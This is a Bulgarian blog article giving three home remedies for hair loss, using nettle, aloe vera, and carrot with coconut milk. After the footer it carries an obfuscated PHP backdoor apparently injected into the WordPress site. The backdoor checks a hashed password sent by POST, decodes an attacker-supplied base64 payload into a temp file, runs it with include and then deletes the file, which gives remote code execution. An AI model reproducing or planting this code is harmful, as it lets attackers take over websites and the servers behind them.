Три природни рецепти при косопад | Косопад

Три природни рецепти при косопад

Косопадът е сред най- често срещаните проблеми през есенния сезон. Ето няколко рецепти как да се справите с него:

maska-za-kosa-mlyako

РЕЦЕПТА С КОПРИВА

Копривата е лечебно растение, което се използва от столетия. Действа стимулиращо на корените и ги подсилва. Има много шампоани и кремове на основата на коприва. В домашни условия можем да се възползваме от тях чрез приготвяне на отвара. Сложете 5 листа коприва в чаша с гореща вода. Оставете да кисне и да изстива. Когато е хладко, нанесете върху влажна коса и оставете да действа 20 минути. Може да го правите два пъти седмично.

kopriva

РЕЦЕПТА С АЛОЕ ВЕРА

Много е полезно за скалпа: лекува го, възстановява го, стимулира растежа на косата като подхранва скалпа. Изцедете гела или прозрачната течност, която се съдържа във вътрешността на листо от алое вера. Смесете го с чаша с топла вода и го разтворете. Нанесете върху влажна коса с лек масаж. Оставете да действа 20 минути. Изплакнете с хладка вода и използвайте обичайния си шампоан.

РЕЦЕПТА С КОКОСОВО МЛЯКО И МОРКОВИ

И двете съставки действат подхранващо на косата. И двете съдържат витамин В, които е много полезен за растеж. Вземете един среден морков и го смесете с кокосово мляко чрез миксер. Смесете двете съставки, докато получите оранжева смес, която да използвате като хидратиращ тоник.

Тази смес също се нанася върху влажна коса. Слагайте го малко по малко и масажирайте. Оставете да действа 20 минути. Сложете си шапка за баня. После изплакнете с хладка вода и измийте, както обичайно. Правете го два пъти седмично.

05. октомври 2014 16:22:16 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}